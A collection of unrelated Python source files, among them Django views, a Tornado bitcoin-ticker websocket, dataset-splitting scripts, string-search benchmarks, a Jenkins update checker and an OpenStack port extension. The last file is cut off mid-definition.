radio = Radio.objects.get(pk=radio_id)
fields = model_to_dict(Radio)
form = RadioForm(initial=fields, instance=radio)
context = {
'form': form,
'type': 'edit',
}
return render(request, 'radio_form.html', context=context)
def delete_radio(request, radio_id):
radio = Radio.objects.get(pk=radio_id)
if request.method == 'POST':
radio.delete()
return HttpResponseRedirect(reverse('radios'))
context = {
'radio': radio
}
return render(request, 'radio_delete_form.html', context=context)
def list_radio(request):
radio = radio.objects.all()
context = {
'radio': radio,
}
return render(request, 'Radio.html', context=context)
|
import tornado.ioloop
import tornado.httpserver
import tornado.web
import tornado.websocket
import tornado.gen
from tornado import httpclient
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler),
(r"/now", BitNowHandler),
]
settings = dict(
template_path="templates",
static_path="static",
)
tornado.web.Application.__init__(self, handlers, **settings)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render('index.html')
class BitNowHandler(tornado.websocket.WebSocketHandler):
clients = []
data = dict()
def open(self):
print(str(id(self)) + '建立连接')
BitNowHandler.clients.append(self)
@tornado.gen.engine
@tornado.web.asynchronous
def on_message(self, message):
client = httpclient.AsyncHTTPClient()
response = yield tornado.gen.Task(client.fetch, 'http://blockchain.info/ticker')
BitNowHandler.data = response.body.decode()
BitNowHandler.send_to_all(BitNowHandler.data)
@staticmethod
def send_to_all(message):
for c in BitNowHandler.clients:
c.write_message(message)
def on_close(self):
print(str(id(self)) + '退出连接')
BitNowHandler.clients.remove(self)
if __name__ == "__main__":
server = tornado.httpserver.HTTPServer(Application())
server.listen(9999)
tornado.ioloop.IOLoop.instance().start()
|
import demjson
import json
# str = """
# {
# id: 225,
# is_in_serving: true,
# description: "有菜有肉,营养均衡",
# title: "简餐",
# link: "eleme://restaurants?filter_key=%7B%22activity_types%22%3A%5B3%5D%2C%22category_schema%22%3A%7B%22category_name%22%3A%22%5Cu7b80%5Cu9910%22%2C%22complex_category_ids%22%3A%5B209%2C212%2C215%2C265%5D%2C%22is_show_all_category%22%3Atrue%7D%2C%22restaurant_category_id%22%3A%7B%22id%22%3A207%2C%22name%22%3A%22%5Cu5feb%5Cu9910%5Cu4fbf%5Cu5f53%22%2C%22sub_categories%22%3A%5B%5D%2C%22image_url%22%3A%22%22%7D%2C%22activities%22%3A%5B%7B%22id%22%3A3%2C%22name%22%3A%22%5Cu4e0b%5Cu5355%5Cu7acb%5Cu51cf%22%2C%22icon_name%22%3A%22%5Cu51cf%22%2C%22icon_color%22%3A%22f07373%22%2C%22is_need_filling%22%3A1%2C%22is_multi_choice%22%3A0%2C%22filter_value%22%3A3%2C%22filter_key%22%3A%22activity_types%22%7D%5D%7D&target_name=%E7%AE%80%E9%A4%90&animation_type=1&is_need_mark=0&banner_type=",
# image_url: "/d/38/7bddb07503aea4b711236348e2632jpeg.jpeg",
# icon_url: "",
# title_color: ""
# }
# """
#
# # print(demjson.decode(str))
# print(json.dumps(demjson.decode(str)))
if __name__ == '__main__':
with open("./data.js","r",encoding="utf8") as f:
for i in demjson.decode(f.read()):
print(json.dumps(i))
|
# -*- coding: utf-8 -*-
import glob, os
import sys
import shutil
# 引数1からフォルダ名取得
args = sys.argv
if (len(args) != 3):
print("Usage: $ python" + args[0] + " <image folder> <ratio of test(%)>")
quit()
path_data = args[1]
percentage_test = int(args[2])
print("Folder name is '%s'. ratio of test is %d%%." % (path_data, percentage_test))
# Current directory
current_dir = os.path.dirname(os.path.abspath(__file__))
# Directory where the data will reside, relative to 'darknet.exe'
# path_data = 'data/all2/'
# Percentage of images to be used for the test set
# percentage_test = 10;
# Create and/or truncate train.txt and test.txt
file_train = open('train.txt', 'w')
file_test = open('test.txt', 'w')
# Populate train.txt and test.txt
counter = 1
index_test = round(100 / percentage_test)
# for pathAndFilename in glob.iglob(os.path.join(current_dir, "*.jpg")):
for pathAndFilename in glob.iglob(os.path.join(path_data, "*.jpg")):
title, ext = os.path.splitext(os.path.basename(pathAndFilename))
# print("title is %s. ext is %s." % (title, ext))
if counter == index_test:
counter = 1
file_test.write(path_data + '/' + title + '.jpg' + '\n')
else:
file_train.write(path_data + '/' + title + '.jpg' + '\n')
counter = counter + 1
file_train.close() # 閉じないと次に開けない
file_test.close() # 閉じないと次に開けない
print("(1/2) Done!")
# ファイル移動
dst_dir = path_data + '/test'
print("dst_dir: '%s'" % dst_dir)
if not os.path.exists(dst_dir) :
os.makedirs(dst_dir)
# 1行抜き出し
file_name = 'test.txt'
print("file_name is '%s'" % file_name)
'''
if not os.path.exists(file_name) :
print("not exit")
else:
print("exist")
'''
with open(file_name) as f:
print("open file")
'''
while True:
s_line = f.readline()
print(s_line)
if not s_line:
break
'''
for line in f:
print("line: %s" % line)
print("画像を %s/test へ移動します" % path_data)
# ファイル名と拡張子を取得
name_base, name_ext = os.path.splitext(line)
print("name_base is '%s'" % name_base)
base_name = os.path.splitext(os.path.basename(line))[0]
print(" base_name: %s" % base_name)
from_file_jpg = name_base + '.jpg'
# from_file_txt = name_base + '.txt'
print("from_file_jpg is '%s'" % from_file_jpg)
to_file_jpg = dst_dir + '/' + base_name + '.jpg'
# to_file_txt = dst_dir + '/' + base_name + '.txt'
print("to_file_jpg is '%s'" % to_file_jpg)
shutil.move(from_file_jpg, to_file_jpg)
# shutil.move(from_file_txt, to_file_txt)
print("(2/2) Done!")
|
from secureFlaskApp import app as application
import sys
import azure.functions as func
import os
import pathlib
root_function_dir = pathlib.Path(__file__).parent.parent
secureFlaskApp_path = os.path.join(root_function_dir, "secureFlaskApp")
sys.path.insert(0, secureFlaskApp_path)
def main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:
return func.WsgiMiddleware(application).handle(req, context)
|
import pandas as pd
import numpy as np
from PIL import Image
import skimage
import imageio
import os
import glob
import warnings
import natsort
warnings.filterwarnings('ignore')
def findFiles(path):
return natsort.natsorted(glob.glob(path))
testlist = findFiles('three splits/split1/*.txt')
trainsample = []
trainlabel = []
testsample = []
testlabel = []
categories = []
for i in range(len(testlist)):
filename = testlist[i].split('/')[-1].split('_test_')[0]
categories.append(filename)
listall = pd.read_table(testlist[i], header=None, delim_whitespace=True)
for j in range(len(listall)):
trainsample.append(listall.ix[j, 0])
trainlabel.append(filename)
for idx in range(len(trainlabel)):
video_dir = os.path.join('HMDB-51', trainlabel[idx], trainsample[idx])
video = imageio.get_reader(video_dir, 'ffmpeg')
print('the training number is: ', idx)
sample = trainsample[idx].split('.')[0]
sample_dir = os.path.join('HMDB', trainlabel[idx], sample)
os.makedirs(sample_dir)
for num, img in enumerate(video):
image = skimage.img_as_float(img).astype(np.float32)
image = Image.fromarray(np.uint8(image * 255))
image.save(sample_dir + '/' + str(num) + '.jpg')
if len(findFiles(sample_dir + '/*.jpg')) == 0:
print(sample_dir)
break
for idx in range(len(testlabel)):
video_dir = os.path.join('HMDB-51', testlabel[idx], testsample[idx])
video = imageio.get_reader(video_dir, 'ffmpeg')
print('the testing number is: ', idx)
sample = testsample[idx].split('.')[0]
sample_dir = os.path.join('HMDB', testlabel[idx], sample)
os.makedirs(sample_dir)
for num, img in enumerate(video):
image = skimage.img_as_float(img).astype(np.float32)
image = Image.fromarray(np.uint8(image * 255))
image.save(sample_dir + '/' + str(num) + '.jpg')
if len(findFiles(sample_dir + '/*.jpg')) == 0:
print(sample_dir)
break
|
import requests
import uuid
from bs4 import BeautifulSoup
from config import YANDEX_TRANS_KEY
def update2text(update, locale): # locale="ru-RU" or "en-US"
message = update.message
text = ""
if message.text:
text = message.text # если в сообщении есть текст, то берём его для начала
if message.voice: # если есть голос, то попробуем его распознать
file_info = message.bot.get_file(message.voice.file_id)
file = requests.get(file_info.file_path) # вроде точно так из телеги файлы выкачиваются
uu_id = str(uuid.uuid4()).replace("-", "")
answer = speech_2_text(file.content, uu_id, locale) # пробуем распознать
if len(answer) != 0:
mv = max(answer, key=answer.get) # если удалось распознать речь, то берём лучшее совпадение
text = mv
if len(text) == 0:
text = None # если в сообщении нет текста или не удалось распознать текст.
return text
def speech_2_text(data, uid, lang):
url = "https://asr.yandex.net/asr_xml?uuid={}&key={}&topic={}&lang={}&disableAntimat={}"
url = url.format(uid, YANDEX_TRANS_KEY, "queries", lang, "true")
headers = {'Content-Type': 'audio/ogg;codecs=opus', 'Content-Length': str(len(data))}
resp = requests.post(url, data=data, headers=headers)
dom = BeautifulSoup(resp.text, "lxml")
result = dict((var.string, float(var['confidence']))
for var
in dom.html.body.recognitionresults.findAll("variant"))
return result
|
import logging
from typing import Sequence
logger = logging.getLogger(__name__)
def gather_exception_subclasses(module, parent_classes: Sequence):
"""
Browse the module's variables, and return all found exception classes
which are subclasses of `parent_classes` (including these, if found in module).
:param module: python module object
:param parent_classes: list of exception classes (or single exception class)
:return: list of exception subclasses
"""
parent_classes = tuple(parent_classes)
selected_classes = []
for (key, value) in vars(module).items():
if isinstance(value, type):
if issubclass(value, parent_classes): # Includes parent classes themselves
selected_classes.append(value)
return selected_classes
def _fully_qualified_name(o):
"""Return the fully qualified dotted name of an object, as a string."""
module = o.__module__
if module is None or module == str.__module__:
return o.__name__ # Avoid reporting __builtin__
else:
return module + "." + o.__name__
#: These ancestor classes are too generic to be included in status slugs
DEFAULT_EXCLUDED_EXCEPTION_CLASSES = (object, BaseException, Exception)
def slugify_exception_class(
exception_class, excluded_classes=DEFAULT_EXCLUDED_EXCEPTION_CLASSES, qualified_name_extractor=_fully_qualified_name
):
"""
Turn an exception class into a list of slugs which identifies it uniquely,
from ancestor to descendant.
:param exception_class: exception class to slugify
:param excluded_classes: list of parents classes so generic that they needn't be included in slugs
:param qualified_name_extractor: callable which turns an exception class into its qualified name
:return: list of strings
"""
# TODO change casing for class name? Inspect exception_class.slug_name if present?
assert isinstance(exception_class, type), exception_class # Must be a CLASS, not an instance!
slugs = [
qualified_name_extractor(ancestor)
for ancestor in reversed(exception_class.__mro__)
if ancestor not in excluded_classes
]
return slugs
def construct_status_slugs_mapper(
exception_classes, fallback_exception_class, exception_slugifier=slugify_exception_class
):
"""
Construct and return a tree where branches are qualified slugs, and each leaf is an exception
class corresponding to the path leading to it.
Intermediate branches can carry an (ancestor) exception class too, but only if this one is explicitely
included in `exception_classes`.
The fallback exception class is stored at the root of the tree under the "" key.
"""
mapper_tree = {"": fallback_exception_class} # Special value at root
for exception_class in exception_classes:
slugs = exception_slugifier(exception_class)
if not slugs:
continue # E.g. for BaseException and the likes, shadowed by fallback_exception_class
current = mapper_tree
for slug in slugs:
current = current.setdefault(slug, {}) # No auto-creation of entries for ancestors
current[""] = exception_class
return mapper_tree
def get_closest_exception_class_for_status_slugs(slugs, mapper_tree):
"""
Return the exception class targeted by the provided status slugs,
or the closest ancestor class if the exact exception class is not in the mapper.
If `slugs` is empty, or if no ancestor is found, the fallback exception of the mapper is returned instead.
:param slugs: qualified status slugs
:param mapper_tree: mapper tree constructed from selected exceptions
:return: exception class object
"""
current = mapper_tree
fallback_exception_class = mapper_tree[""] # Ultimate root fallback
for slug in slugs:
current = current.get(slug)
if current is None:
return fallback_exception_class
else:
fallback_exception_class = current.get("", fallback_exception_class)
return current.get("", fallback_exception_class)
class StatusSlugsMapper:
"""
High-level wrapper for converting exceptions from/to status slugs.
"""
def __init__(self, exception_classes, fallback_exception_class, exception_slugifier=slugify_exception_class):
self._slugify_exception_class = exception_slugifier
self._mapper_tree = construct_status_slugs_mapper(
exception_classes=exception_classes,
fallback_exception_class=fallback_exception_class,
exception_slugifier=exception_slugifier,
)
def slugify_exception_class(self, exception_class, *args, **kwargs):
"""Use the exception slugifier provided in `__init__()` to turn an exception class into a qualified name."""
return self._slugify_exception_class(exception_class, *args, **kwargs)
def get_closest_exception_class_for_status_slugs(self, slugs):
"""Return the closest exception class targeted by the provided status slugs,
with a fallback class if no matching ancestor is found at all."""
return get_closest_exception_class_for_status_slugs(slugs, mapper_tree=self._mapper_tree)
gather_exception_subclasses = staticmethod(gather_exception_subclasses)
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import functools
import os
from contextlib import contextmanager
from dataclasses import dataclass
from threading import Thread
from typing import Any, BinaryIO, Dict, Iterable, Tuple
from pylsp_jsonrpc.endpoint import Endpoint # type: ignore[import]
from pylsp_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter # type: ignore[import]
from pants.bsp.context import BSPContext
from pants.bsp.protocol import BSPConnection
from pants.bsp.rules import rules as bsp_rules
from pants.engine.internals.native_engine import PyThreadLocals
from pants.testutil.rule_runner import RuleRunner
@dataclass(frozen=True)
class PipesForTest:
server_reader: BinaryIO
server_writer: BinaryIO
client_writer: BinaryIO
client_reader: BinaryIO
@contextmanager
def setup_pipes():
server_reader_fd, client_writer_fd = os.pipe()
server_reader = os.fdopen(server_reader_fd, "rb", buffering=0)
client_writer = os.fdopen(client_writer_fd, "wb", buffering=0)
client_reader_fd, server_writer_fd = os.pipe()
client_reader = os.fdopen(client_reader_fd, "rb", buffering=0)
server_writer = os.fdopen(server_writer_fd, "wb", buffering=0)
wrapper = PipesForTest(
server_reader=server_reader,
server_writer=server_writer,
client_writer=client_writer,
client_reader=client_reader,
)
try:
yield wrapper
finally:
server_reader.close()
server_writer.close()
client_writer.close()
client_reader.close()
# A notification method name, and a subset of its fields.
NotificationSubset = Tuple[str, Dict[str, Any]]
@dataclass
class Notifications:
_notifications: list[tuple[str, dict[str, Any]]]
def _record(self, method_name: str, notification: dict[str, Any]) -> None:
self._notifications.append((method_name, notification))
def assert_received_unordered(self, expected: Iterable[NotificationSubset]) -> None:
"""Asserts that the buffer contains matching notifications, then clears the buffer."""
expected = list(expected)
for notification_method_name, notification in self._notifications:
for i in range(len(expected)):
candidate_method_name, candidate_subset = expected[i]
if candidate_method_name != notification_method_name:
continue
# If the candidate was a subset of the notification, then we've matched.
if candidate_subset.items() <= notification.items():
expected.pop(i)
break
else:
raise AssertionError(
f"Received unexpected `{notification_method_name}` notification: {notification}"
)
if expected:
raise AssertionError(f"Did not receive all expected notifications: {expected}")
self._notifications.clear()
@contextmanager
def setup_bsp_server(
rule_runner: RuleRunner | None = None, *, notification_names: set[str] | None = None
):
rule_runner = rule_runner or RuleRunner(rules=bsp_rules())
notification_names = notification_names or set()
thread_locals = PyThreadLocals.get_for_current_thread()
with setup_pipes() as pipes:
context = BSPContext()
rule_runner.set_session_values({BSPContext: context})
conn = BSPConnection(
rule_runner.scheduler,
rule_runner.union_membership,
context,
pipes.server_reader,
pipes.server_writer,
)
def run_bsp_server():
thread_locals.set_for_current_thread()
conn.run()
bsp_thread = Thread(target=run_bsp_server)
bsp_thread.daemon = True
bsp_thread.start()
client_reader = JsonRpcStreamReader(pipes.client_reader)
client_writer = JsonRpcStreamWriter(pipes.client_writer)
notifications = Notifications([])
endpoint = Endpoint(
{name: functools.partial(notifications._record, name) for name in notification_names},
lambda msg: client_writer.write(msg),
)
def run_client():
client_reader.listen(lambda msg: endpoint.consume(msg))
client_thread = Thread(target=run_client)
client_thread.daemon = True
client_thread.start()
try:
yield endpoint, notifications
finally:
client_reader.close()
client_writer.close()
|
import os
import re
import sys
nginxConfPath = sys.argv[1]
confPathList_file = sys.argv[2]
nginxfile = nginxConfPath
file_tmp = confPathList_file + 'confPathList.txt'
def getConfPath(confFile,confFile_tmp):
if os.path.isfile(confFile):
fo = open(confFile)
readlines = fo.readlines()
for strline in readlines:
if re.match('\s*#.*', strline) is not None:
continue
includePath = None
if re.match("\s*include\s+'\s*(.*)\s*'\s*;", strline) is not None:
includeMatch = re.match("\s*include\s+'\s*(.*)\s*'\s*;", strline)
includePath = includeMatch.group(1).strip()
elif re.match('\s*include\s+"\s*(.*)\s*"\s*;', strline) is not None:
includeMatch = re.match('\s*include\s+"\s*(.*)\s*"\s*;', strline)
includePath = includeMatch.group(1).strip()
elif re.match('\s*include\s+(.*)\s*;', strline) is not None:
includeMatch = re.match('\s*include\s+(.*)\s*;', strline)
includePath = includeMatch.group(1).strip()
if includePath is not None:
if includePath.startswith('/') == False:
includePath = nginxfile.rpartition('/')[0] + '/' + includePath
searchFileList = searchFile(includePath)
search_readlines = searchFileList.readlines()
for search_read in search_readlines:
confFile_tmp.write(search_read.strip() + '\n')
getConfPath(search_read.strip(), confFile_tmp)
fo.close()
def searchFile(path):
cmd = "find / -regextype 'posix-egrep' -regex " + "'" + path.replace('*','.*') + "'"
cmdResult = os.popen(cmd)
return cmdResult
if os.path.isfile(nginxfile):
fo_tmp = open(file_tmp, 'w+')
getConfPath(nginxfile, fo_tmp)
fo_tmp.close()
|
# Generated by Django 2.1.2 on 2019-02-15 16:44
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0040_auto_20190215_1449'),
]
operations = [
migrations.AddField(
model_name='type',
name='step_for_min_quantity',
field=models.FloatField(blank=True, default=0.1, help_text='Рекомендації: 0.1 для вагових продуктів та 1 для продуктів, що продаються поштучно. Значення по замовчуванню (якщо не вказати): 0.1', null=True, verbose_name='Крок збільшення/зменшення для кількості'),
),
migrations.AlterField(
model_name='type',
name='min_quantity',
field=models.IntegerField(blank=True, default=1, help_text='Мінімальна кількість шт чи кг, яку можна замовити. Вказується для типу продуктів в цілому. Значення по замовчуванню(якщо не вказати): 1', null=True, validators=[django.core.validators.MaxValueValidator(999), django.core.validators.MinValueValidator(1)], verbose_name='Мінімально можлива кількість до замовлення:'),
),
]
|
import time
import string
import random
# import math
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
# defines the number of times each algorithm will be processed to obtain the
# average time
num_rounds = 20
SEQUENCE_LENGTH = 0.1
DR = dict()
def Naive(T, S):
i, j = 0, 0
while i < len(T):
if len(T) - i == len(S):
return T[i:] == S
elif T[i:i + len(S)] == S:
return True
else:
i += 1
j = 0
return False
def create_kmp_table(S):
i, j = 0, 1
T = [0] * len(S)
while j < len(S):
if S[i] == S[j]:
T[j] = i + 1
i += 1
j += 1
elif i == 0:
T[j] = 0
j += 1
else:
i = T[i - 1]
return T
def KMP(T, S):
if len(S) > len(T):
return False
table = create_kmp_table(S)
i, j = 0, 0
while i < len(T):
if T[i] == S[j]:
if j == len(S) - 1:
return True
i += 1
j += 1
else:
if j > 0:
j = table[j - 1]
else:
i += 1
return False
def BMH(T, S):
if len(S) > len(T):
return False
table = {}
for i in range(len(S)):
if i < len(S) - 1:
table[S[i]] = len(S) - i - 1
elif S[i] not in table:
table[S[i]] = len(S)
i = len(S) - 1
while i < len(T):
if T[i] != S[-1] or T[i-len(S)+1:i+1] != S:
i += table[T[i]] if T[i] in table else len(S)
else:
return True
return False
def BMH_2(text, pattern):
m = len(pattern)
n = len(text)
if m > n:
return -1
skip = []
for k in range(256):
skip.append(m)
for k in range(m - 1):
skip[ord(pattern[k])] = m - k - 1
skip = tuple(skip)
k = m - 1
while k < n:
j = m - 1
i = k
while j >= 0 and text[i] == pattern[j]:
j -= 1
i -= 1
if j == -1:
return True
k += skip[ord(text[k])]
return False
def plot(data):
df = pd.DataFrame.from_dict(data, orient='index', columns=['Time'])
df['Algorithm'] = [i.split("##")[0] for i in df.index]
df['Size'] = [int(i.split("##")[1]) for i in df.index]
# Defines font size and line width
sns.set(font_scale=1, style="ticks", rc={"lines.linewidth": 2})
# Defines plot size
plt.rcParams['figure.figsize'] = [20, 10]
chart = sns.lineplot(x='Size', y='Time', hue='Algorithm', data=df)
# plt.yscale('log')
chart.set(xticks=[i for i in df.Size])
plt.show()
# calculates the executions average time
def avgTime(func, size, debug=True):
t = 0
for i in range(num_rounds):
random.seed(size + i)
T = "".join([random.choice(string.ascii_letters) for i in range(size)])
start = random.randint(1, size)
end = min(start + int(size * SEQUENCE_LENGTH + 1), size)
S = T[start:end]
start = time.time()
p = func(T, S)
end = time.time()
t += end - start
if debug:
# add the result or check if it is the same
if (size, i) not in DR:
DR[(size, i)] = (p, T, S)
else:
(sp, sT, sS) = DR[(size, i)]
if p != sp:
print(f"1. S={DR[(size, i)][2]}, found={DR[(size, i)][0]} \
and T={DR[(size, i)][1]}")
print(f"2. S={S}, found={p} and T={T} ")
assert p == sp
return t / num_rounds
def run():
# defines the algorithms to be processed
algorithms = [Naive, KMP, BMH]
algorithms = [Naive, KMP, BMH]
sizes = [10000, 20000, 30000, 40000, 50000]
mapSizeToTime = dict()
for i in range(len(sizes)):
print(f"Starting collect {i + 1}")
# map list size to algorithm average time
for algorithm in algorithms:
print(' > ', algorithm.__name__)
mapSizeToTime[f"{algorithm.__name__}##{sizes[i]}"] = \
avgTime(algorithm, sizes[i], True)
print("Finish data collection")
plot(mapSizeToTime)
if __name__ == "__main__":
run()
|
import json
import os
import re
import smtplib
import sys
from email.mime.text import MIMEText
import backoff
import requests
# get variables from environment
CHECK_JENKINS_UPDATES_SOURCE = os.getenv(
'CHECK_JENKINS_UPDATES_SOURCE',
'http://updates.jenkins-ci.org/stable/update-center.json')
CHECK_JENKINS_UPDATES_SMTP = os.getenv(
'CHECK_JENKINS_UPDATES_SMTP',
'localhost')
CHECK_JENKINS_UPDATES_FROM = os.getenv(
'CHECK_JENKINS_UPDATES_FROM',
'check-jenkins-updates@unknown')
CHECK_JENKINS_UPDATES_RECIPIENT = os.getenv(
'CHECK_JENKINS_UPDATES_RECIPIENT',
'root@localhost').split(',')
CHECK_JENKINS_UPDATES_CACHE = os.getenv(
'CHECK_JENKINS_UPDATES_CACHE',
'/tmp/check_jenkins_version.cache')
CHECK_JENKINS_UPDATES_RETRY_TIMEOUT = int(os.getenv(
'CHECK_JENKINS_UPDATES_RETRY_TIMEOUT',
'120'))
if os.getenv('CHECK_JENKINS_UPDATES_DEBUG', '0') == '1':
DEBUG = True
else:
DEBUG = False
def main():
# load previous check results from cache
if os.path.isfile(CHECK_JENKINS_UPDATES_CACHE):
if DEBUG: print('found cache file')
with open(CHECK_JENKINS_UPDATES_CACHE, 'r') as f:
try:
previous_check = json.load(f)
cache_file_loaded = True
except ValueError:
if DEBUG: print('cache file does not contain valid JSON, '
'forcing update check')
cache_file_loaded = False
else:
if DEBUG: print('no cache file found, forcing update check')
cache_file_loaded = False
if cache_file_loaded == False:
previous_check = {
'url': '',
'sha1': '',
'buildDate': '',
'version': '',
'name': ''
}
# get current version details from update source
r = get_current_versions(CHECK_JENKINS_UPDATES_SOURCE)
try:
raw_json = re.search('\n(.*?)\n', r.text).group(1)
except AttributeError:
print('error: could not parse JSON from remote update source')
sys.exit(1)
current_json = json.loads(raw_json)
# save current version to cache
with open(CHECK_JENKINS_UPDATES_CACHE, 'w') as f:
json.dump(current_json['core'], f)
# check for version change
if previous_check['version'] != current_json['core']['version']:
output = (f"version change detected: {previous_check['version']} -> "
f"{current_json['core']['version']}")
subject = ("new Jenkins release is available: "
f"{current_json['core']['version']}")
if DEBUG: print(output)
send_email(subject, output)
if DEBUG: print('email sent!')
else:
if DEBUG: print(f"latest version has not changed (is: "
f"{current_json['core']['version']})")
@backoff.on_exception(backoff.expo,
requests.exceptions.ConnectionError,
max_time=CHECK_JENKINS_UPDATES_RETRY_TIMEOUT)
def get_current_versions(url):
return requests.get(CHECK_JENKINS_UPDATES_SOURCE)
def send_email(msg_subject, msg_text):
msg = MIMEText(msg_text)
msg['Subject'] = msg_subject
msg['From'] = CHECK_JENKINS_UPDATES_FROM
msg['To'] = ','.join(CHECK_JENKINS_UPDATES_RECIPIENT)
if DEBUG: print(f"sending email via mailserver "
f"{CHECK_JENKINS_UPDATES_SMTP}")
s = smtplib.SMTP(CHECK_JENKINS_UPDATES_SMTP)
s.sendmail(CHECK_JENKINS_UPDATES_FROM, CHECK_JENKINS_UPDATES_RECIPIENT,
msg.as_string())
s.quit()
if __name__ == "__main__":
main()
|
import heapq
# def __init__(self):
# self.cost = 0
def connectRopes(ropes):
minH = []
for value in ropes:
heapq.heappush(minH, value)
cost = 0
while len(minH) >= 2:
first = heapq.heappop(minH)
second = heapq.heappop(minH)
cost = cost + first + second
heapq.heappush(minH, first+second)
return cost
print(connectRopes([1, 18]))
print(connectRopes([1, 2, 5, 10, 35, 89]))
|
# coding: utf-8
# In[1]:
import numpy as np
import cv2
import imutils
# In[2]:
img = cv2.imread('./datasets/flower1.jpg')
cv2.imshow("Original_Image", img)
cv2.waitKey(0)
# In[3]:
#Flipping Horizontally
flip_horizontal = cv2.flip(img, 1)
cv2.imshow("Image_Flipped_Horizontal", flip_horizontal)
cv2.waitKey(0)
# In[4]:
#Flipping Vertically
flip_vertical = cv2.flip(img, 0)
cv2.imshow('Image_Flipped_Vertically', flip_vertical)
cv2.waitKey(0)
# In[5]:
#Flip along both the axes
flip_both = cv2.flip(img, -1)
cv2.imshow("Flip_Both_Axes", flip_both)
cv2.waitKey(0)
# In[ ]:
|
import sys
import os
from ete3 import Tree
def str_2(ll):
return "{0:.2f}".format(ll)
def str_4(ll):
return "{0:.4f}".format(ll)
def print_likelihood_sums(treerecs_file):
ale_ll = 0.0
pll_ll = 0.0
for line in open(treerecs_file).readlines():
split = line.split(" ")
for index, val in enumerate(split):
if (val == "logLk"):
if (split[index - 1] == "ALE"):
ale_ll += float(split[index + 2][:-1])
elif (split[index - 1] == "libpll"):
pll_ll += float(split[index + 2][:-1])
#print("Total ALE ll: " + str(ale_ll))
#print("Total PLL ll: " + str(pll_ll))
print("Total joint ll: " + str_2(pll_ll + ale_ll))
def get_rf(tree1, tree2):
return tree1.robinson_foulds(tree2, unrooted_trees=True)[0]
def get_relative_rf(tree1, tree2):
rf = tree1.robinson_foulds(tree2, unrooted_trees=True)
return float(rf[0]) / float(rf[1])
def read_list_trees(newick):
try:
trees = []
for line in open(newick).readlines():
if (line.startswith(">")):
continue
trees.append(Tree(line, format=1))
return trees
except:
return None
def build_rf_list(trees1, trees2):
rf_list = []
for t1, t2 in zip(trees1, trees2):
rf_list.append(get_rf(t1, t2))
return rf_list
def build_relative_rf_list(trees1, trees2):
rf_list = []
for t1, t2 in zip(trees1, trees2):
rf_list.append(get_relative_rf(t1, t2))
return rf_list
def analyze_correctness(trees1, trees2, tree2_file, name):
print("")
print("## Analysing " + name + " trees...")
if (trees2 == None):
print("No trees")
return
relative_rf_list = build_relative_rf_list(trees1, trees2)
relative_rf_average = sum(relative_rf_list) / float(len(relative_rf_list))
rf_list = build_rf_list(trees1, trees2)
rf_average = sum(rf_list) / float(len(rf_list))
exactness_frequency = rf_list.count(0.0) / float(len(rf_list))
print("Average relative RF with true trees: " + str_4(relative_rf_average))
print("Average RF with true trees: " + str_4(rf_average))
print(str_2(exactness_frequency * 100) + "% of the trees exactly match the true trees")
print_likelihood_sums(tree2_file)
if (len(sys.argv) != 4 and len(sys.argv) != 5):
print("Syntax: python raxml_vs_trecs.py true_trees raxml_trees best_treerecs_trees [tree_analysis_dir]")
sys.exit(1)
#true_trees = read_list_trees("/hits/basement/sco/morel/github/datasets/simuls/trueGeneTrees.newick")
#raxml_trees = read_list_trees("/hits/basement/sco/morel/github/datasets/simuls/geneTrees.newick")
#treerecs_trees = read_list_trees("/hits/basement/sco/morel/github/phd_experiments/results/treerecs/launch_treerecs/simuls/haswell_16/run_0/treerecs_output.newick.best")
true_trees_file = sys.argv[1]
raxml_trees_file = sys.argv[2]
treerecs_trees_file = sys.argv[3]
true_trees = read_list_trees(true_trees_file)
raxml_trees = read_list_trees(raxml_trees_file)
treerecs_trees_file_best = treerecs_trees_file + ".best"
treerecs_trees_file_treesearch = treerecs_trees_file + ".tree_search"
treerecs_trees_best = read_list_trees(treerecs_trees_file_best)
treerecs_trees_treesearch = read_list_trees(treerecs_trees_file_treesearch)
threshold_trees_dir = 0
if (len(sys.argv) == 5):
threshold_trees_dir = sys.argv[4]
analyze_correctness(true_trees, raxml_trees, raxml_trees_file, "RAXML")
analyze_correctness(true_trees, treerecs_trees_best, treerecs_trees_file_best, "TREERECS BEST THRESHOLD")
analyze_correctness(true_trees, treerecs_trees_treesearch, treerecs_trees_file_treesearch, "TREERECS TREE SEARCH")
if (threshold_trees_dir != 0):
per_threshold_files = os.listdir(threshold_trees_dir)
for per_threshold_file in per_threshold_files:
threshold_trees = read_list_trees(os.path.join(threshold_trees_dir, per_threshold_file))
analyze_correctness(true_trees, threshold_trees, os.path.join(threshold_trees_dir, per_threshold_file), per_threshold_file)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Port extension implementations
"""
from cliff import hooks
from osc_lib.cli import parseractions
from openstack.network.v2 import port as port_sdk
from openstack import resource
from openstackclient.i18n import _
from openstackclient.network.v2 import port
_get_attrs_port_new = port._get_attrs
def _convert_erspan_config(parsed_args):
ops = []
for opt in parsed_args.apic_erspan_config:
addr = {}
addr['dest_ip'] = opt['dest-ip']
addr['flow_id'] = opt['flow-id']
if 'direction' in opt:
addr['direction'] = opt['direction']
ops.append(addr)
return ops
def _get_attrs_port_extension(client_manager, parsed_args):
attrs = _get_attrs_port_new(client_manager, parsed_args)
if parsed_args.apic_erspan_config:
attrs['apic:erspan_config'
] = _convert_erspan_config(parsed_args)
if parsed_args.no_apic_erspan_config:
attrs['apic:erspan_config'] = []
return attrs
port._get_attrs = _get_attrs_port_extension
port_sdk.Port.apic_synchronization_state = resource.Body(
'apic:synchronization_state')
port_sdk.Port.apic_erspan_config = resource.Body('apic:erspan_config')
class CreateAndSetPortExtension(hooks.CommandHook):
def get_parser(self, parser):
parser.add_argument(
'--apic-erspan-config',
metavar="<apic_erspan_config>",
dest='apic_erspan_config',
